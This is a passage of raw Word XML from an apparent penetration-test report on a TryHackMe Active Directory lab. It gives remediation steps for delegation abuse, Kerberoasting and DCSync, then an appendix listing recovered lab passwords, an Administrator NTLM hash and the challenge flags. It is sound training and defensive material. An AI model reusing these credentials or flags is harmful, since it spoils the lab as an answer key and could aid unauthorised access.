          <w:bottom w:val="single" w:sz="6" w:space="8" w:color="C7CEDA"/>
        </w:pBdr>
        <w:spacing w:before="0" w:after="160"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="14" w:space="6" w:color="1F2A44"/>
        </w:pBdr>
        <w:spacing w:before="260" w:after="140"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_Toc234251556"/>
      <w:r>
        <w:rPr/>
        <w:t>6. Consolidated Recommendations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The following prioritized actions will close the demonstrated attack path and strengthen the environment against similar attacks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="200" w:after="90"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Toc234251557"/>
      <w:r>
        <w:rPr/>
        <w:t>Immediate (0–7 days)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:lineRule="auto" w:line="264" w:before="0" w:after="70"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Remove or tightly scope the Constrained Delegation (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>msDS-AllowedToDelegateTo</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">) on the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>password-reset</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> account and audit all delegation rights.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:lineRule="auto" w:line="264" w:before="0" w:after="70"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Rotate every credential exposed during the engagement: Visitor, password-reset, the database account, Administrator, and (twice) krbtgt.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:lineRule="auto" w:line="264" w:before="0" w:after="70"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Remove credential-bearing content from the RDP login screen and remove the web backup file.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="200" w:after="90"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="_Toc234251558"/>
      <w:r>
        <w:rPr/>
        <w:t>Short-term (1–4 weeks)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:lineRule="auto" w:line="264" w:before="0" w:after="70"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Add Tier-0 accounts to the Protected Users group and set “cannot be delegated.”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:lineRule="auto" w:line="264" w:before="0" w:after="70"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Enforce strong service-account password policy or migrate to gMSA; remove unnecessary SPNs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:lineRule="auto" w:line="264" w:before="0" w:after="70"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Lock down RDP to jump hosts with NLA and MFA; apply a clean-desk / secure-screen GPO.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="200" w:after="90"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="_Toc234251559"/>
      <w:r>
        <w:rPr/>
        <w:t>Strategic (ongoing)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:lineRule="auto" w:line="264" w:before="0" w:after="70"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Implement a tiered administration model to separate Tier-0 (DC/domain) credentials from daily-use accounts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:lineRule="auto" w:line="264" w:before="0" w:after="70"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Deploy monitoring for Kerberoasting (4769), DCSync/replication from non-DCs, and anomalous delegation use.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:lineRule="auto" w:line="264" w:before="0" w:after="70"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Establish a recurring credential-hygiene and AD misconfiguration review (e.g. with BloodHound / PingCastle).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="14" w:space="6" w:color="1F2A44"/>
        </w:pBdr>
        <w:spacing w:before="0" w:after="140"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="_Toc234251560"/>
      <w:r>
        <w:rPr/>
        <w:t>Appendix A: Compromised Assets &amp; Flags</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:jc w:val="start"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="70" w:type="dxa"/>
          <w:start w:w="110" w:type="dxa"/>
          <w:bottom w:w="70" w:type="dxa"/>
          <w:end w:w="110" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:noHBand="0" w:noVBand="0" w:firstColumn="0" w:lastRow="0" w:lastColumn="0" w:firstRow="0" w:val="0000"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2999"/>
        <w:gridCol w:w="3600"/>
        <w:gridCol w:w="2761"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2999"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Asset</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3600"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Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2761" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:start w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:end w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
            </w:tcBorders>
            <w:shd w:color="auto" w:fill="1F2A44" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:lineRule="auto" w:line="250" w:before="0" w:after="20"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2999"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Visitor account</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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8"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>GuestLogin!</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="27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RDP sticky note</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2999"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Database account</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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8"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>C00ctusAdm1n / B4dt0th3b0n3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="27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Web backup (db.cooctus.corp)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2999"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password-reset account</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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8"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>resetpassword</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="27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Kerberoasting</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2999"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Administrator NTLM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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8"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>add41095f1fb0405b32f70a489de022d</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="27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DCSync</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2999"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User flag (#1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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8"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>THM{Gu3st_Pl3as3}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="27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C:\Shares\Home</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2999"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Planted account (#2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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8"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>admCroccCrew</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="27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Domain user enumeration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2999"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Privileged User flag (#3)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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8"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>THM{0n-Y0ur-Way-t0-DA}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="27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C:\Shares\Home</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2999"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2nd Privileged flag (#4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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8"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>THM{Wh4t-t0-d0...Wh4t-t0-d0}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="27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C:\Shares\Home</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2999"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b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Root flag (#5)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3600" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:start w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:end w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
            </w:tcBorders>
            <w:shd w:color="auto" w:fill="FBFCFD" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2A44"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>THM{Cr0ccCrewStr1kes!}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2761" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:start w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:end w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:lineRule="auto" w:line="250" w:before="0" w:after="20"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="5B6472"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>C:\PerfLogs\Admin</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="14" w:space="6" w:color="1F2A44"/>
        </w:pBdr>
        <w:spacing w:before="260" w:after="140"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="_Toc234251561"/>
      <w:r>
        <w:rPr/>
        <w:t>Appendix B: Severity Rating Definitions</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:jc w:val="start"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="60" w:type="dxa"/>
          <w:start w:w="90" w:type="dxa"/>
          <w:bottom w:w="60" w:type="dxa"/>
          <w:end w:w="90" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:noHBand="0" w:noVBand="0" w:firstColumn="0" w:lastRow="0" w:lastColumn="0" w:firstRow="0" w:val="0000"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1699"/>
        <w:gridCol w:w="7661"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1699" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:start w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:end w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:tbl>
            <w:tblPr>
              <w:tblW w:w="1500" w:type="dxa"/>
              <w:jc w:val="start"/>
              <w:tblInd w:w="0" w:type="dxa"/>
              <w:tblLayout w:type="fixed"/>
              <w:tblCellMar>
                <w:top w:w="40" w:type="dxa"/>
                <w:start w:w="80" w:type="dxa"/>
                <w:bottom w:w="40" w:type="dxa"/>
                <w:end w:w="80" w:type="dxa"/>
              </w:tblCellMar>
              <w:tblLook w:noHBand="0" w:noVBand="0" w:firstColumn="0" w:lastRow="0" w:lastColumn="0" w:firstRow="0" w:val="0000"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="1500"/>
            </w:tblGrid>
            <w:tr>
              <w:trPr/>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="1500" w:type="dxa"/>
                  <w:tcBorders/>
                  <w:shd w:color="auto" w:fill="7A1620" w:val="clear"/>
                </w:tcPr>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="Normal"/>
                    <w:jc w:val="center"/>
                    <w:rPr/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>CRITICAL</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7661" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:start w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:end w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="70" w:type="dxa"/>
              <w:start w:w="110" w:type="dxa"/>
              <w:bottom w:w="70" w:type="dxa"/>
              <w:end w:w="110" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:lineRule="auto" w:line="250" w:before="0" w:after="20"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Immediately exploitable for full compromise of the domain or critical systems. Requires urgent remediation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1699" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:start w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:end w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:tbl>
            <w:tblPr>
              <w:tblW w:w="1500" w:type="dxa"/>
              <w:jc w:val="start"/>
              <w:tblInd w:w="0" w:type="dxa"/>
              <w:tblLayout w:type="fixed"/>
              <w:tblCellMar>
                <w:top w:w="40" w:type="dxa"/>
                <w:start w:w="80" w:type="dxa"/>
                <w:bottom w:w="40" w:type="dxa"/>
                <w:end w:w="80" w:type="dxa"/>
              </w:tblCellMar>
              <w:tblLook w:noHBand="0" w:noVBand="0" w:firstColumn="0" w:lastRow="0" w:lastColumn="0" w:firstRow="0" w:val="0000"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="1500"/>
            </w:tblGrid>
            <w:tr>
              <w:trPr/>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="1500" w:type="dxa"/>
                  <w:tcBorders/>
                  <w:shd w:color="auto" w:fill="B0341D" w:val="clear"/>
                </w:tcPr>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="Normal"/>
                    <w:jc w:val="center"/>
                    <w:rPr/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>HIGH</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7661" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:start w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:end w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="70" w:type="dxa"/>
              <w:start w:w="110" w:type="dxa"/>
              <w:bottom w:w="70" w:type="dxa"/>
              <w:end w:w="110" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:lineRule="auto" w:line="250" w:before="0" w:after="20"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Significant risk that provides a direct path to escalation or access to sensitive data.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1699" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:start w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:end w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:tbl>
            <w:tblPr>
              <w:tblW w:w="1500" w:type="dxa"/>
              <w:jc w:val="start"/>
              <w:tblInd w:w="0" w:type="dxa"/>
              <w:tblLayout w:type="fixed"/>
              <w:tblCellMar>
                <w:top w:w="40" w:type="dxa"/>
                <w:start w:w="80" w:type="dxa"/>
                <w:bottom w:w="40" w:type="dxa"/>
                <w:end w:w="80" w:type="dxa"/>
              </w:tblCellMar>
              <w:tblLook w:noHBand="0" w:noVBand="0" w:firstColumn="0" w:lastRow="0" w:lastColumn="0" w:firstRow="0" w:val="0000"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="1500"/>
            </w:tblGrid>
            <w:tr>
              <w:trPr/>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="1500" w:type="dxa"/>
                  <w:tcBorders/>
                  <w:shd w:color="auto" w:fill="B8860B" w:val="clear"/>
                </w:tcPr>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="Normal"/>
                    <w:jc w:val="center"/>
                    <w:rPr/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>MODERATE</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7661" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:start w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:end w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="70" w:type="dxa"/>
              <w:start w:w="110" w:type="dxa"/>
              <w:bottom w:w="70" w:type="dxa"/>
              <w:end w:w="110" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:lineRule="auto" w:line="250" w:before="0" w:after="20"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Meaningful weakness that aids an attacker in combination with other issues.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1699" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:start w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:end w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:tbl>
            <w:tblPr>
              <w:tblW w:w="1500" w:type="dxa"/>
              <w:jc w:val="start"/>
              <w:tblInd w:w="0" w:type="dxa"/>
              <w:tblLayout w:type="fixed"/>
              <w:tblCellMar>
                <w:top w:w="40" w:type="dxa"/>
                <w:start w:w="80" w:type="dxa"/>
                <w:bottom w:w="40" w:type="dxa"/>
                <w:end w:w="80" w:type="dxa"/>
              </w:tblCellMar>
              <w:tblLook w:noHBand="0" w:noVBand="0" w:firstColumn="0" w:lastRow="0" w:lastColumn="0" w:firstRow="0" w:val="0000"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="1500"/>
            </w:tblGrid>
            <w:tr>
              <w:trPr/>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="1500" w:type="dxa"/>
                  <w:tcBorders/>
                  <w:shd w:color="auto" w:fill="2E5AAC" w:val="clear"/>
                </w:tcPr>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="Normal"/>
                    <w:jc w:val="center"/>
                    <w:rPr/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>LOW</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7661" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:start w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:end w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
            </w:tcBorders>
            <w:tcMar>
